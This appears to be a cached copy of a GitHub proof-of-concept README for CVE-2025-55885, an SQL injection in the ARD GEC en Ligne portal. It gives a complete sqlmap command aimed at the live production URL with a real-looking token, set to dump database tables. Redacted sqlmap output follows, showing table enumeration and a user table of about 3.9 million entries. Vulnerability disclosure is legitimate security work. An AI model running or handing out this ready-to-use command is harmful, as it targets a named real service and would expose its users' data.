CVE-2025-55885 PoC — ARD GEC en Lign 安全漏洞

Source

https://github.com/0xZeroSec/CVE-2025-55885

Associated Vulnerability

Title:ARD GEC en Lign 安全漏洞 (CVE-2025-55885)
Description:ARD GEC en Ligne是法国ARD公司的一个线上服务门户网站。 ARD GEC en Lign 2025-04-23之前版本存在安全漏洞，该漏洞源于index.php中GET参数处理不当，可能导致SQL注入攻击和权限提升。

Readme

# CVE-2025-55885
### Description
SQL Injection vulnerability in Alpes Recherche et Developpement ARD GEC
en Ligne before v.2025-04-23 allows a remote attacker to escalate
privileges via the GET parameters in index.php

### Attack Vectors
SQL injection via unsanitized GET parameter ocid on https://services.ard.fr/index.php (transaction confirmation page).

### Proof Of Concept
**Payload**
```
sqlmap -u "https://services.ard.fr/index.php?id=5869&ocid=183&token=1SemPugSUq3maSpK81871559797854161&transactionID=123" -p "ocid" --dbms=mysql -D ard-T [TABLE] --dump
````

**List of Tables**
```
[18:36:46] [INFO] retrieved: [redacted]
[18:37:15] [INFO] retrieved: [redacted]
[18:37:27] [INFO] retrieved: [redacted]
[18:37:39] [INFO] retrieved: [redacted]
[18:37:58] [INFO] retrieved: [redacted]
[18:38:15] [INFO] retrieved: [redacted]
[18:38:27] [INFO] retrieved: [redacted]
[18:38:59] [INFO] retrieved: [redacted]
[18:39:09] [INFO] retrieved: [redacted]
[18:39:30] [INFO] retrieved: [redacted]
[18:39:51] [INFO] retrieved: [redacted]
[18:40:03] [INFO] retrieved: [redacted]
[18:40:18] [INFO] retrieved: [redacted]
[18:40:35] [INFO] retrieved: [redacted]
[18:41:02] [INFO] retrieved: [redacted]
[18:41:48] [INFO] retrieved: [redacted]
[18:42:06] [INFO] retrieved: [redacted]
[18:42:23] [INFO] retrieved: [redacted]
[18:42:44] [INFO] retrieved: [redacted]
[18:43:04] [INFO] retrieved: [redacted]
[18:43:25] [INFO] retrieved: [redacted]
[18:44:01] [INFO] retrieved: [redacted]
[18:44:20] [INFO] retrieved: [redacted]
[18:44:40] [INFO] retrieved: [redacted]
[18:45:01] [INFO] retrieved: [redacted]
[18:45:13] [INFO] retrieved: [redacted]
[18:45:36] [INFO] retrieved: [redacted]
[18:45:54] [INFO] retrieved: [redacted]
[18:46:31] [INFO] retrieved: [redacted]
[18:46:56] [INFO] retrieved: [redacted]
[18:47:02] [INFO] retrieved: [redacted]
[18:47:13] [INFO] retrieved: [redacted]
[18:47:34] [INFO] retrieved: [redacted]
[18:47:58] [INFO] retrieved: [redacted]
[18:48:21] [INFO] retrieved: [redacted]
[19:45:51] [INFO] fetching entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] fetching number of entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] retrieved: 3904699
```

### Reseachers
- [raphckrman](https://github.com/raphckrman)

File Snapshot


 [4.0K]  /data/pocs/4d1e3c56b2e3c2b4b5b8db4c119dd876015cd03c
└── [2.2K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!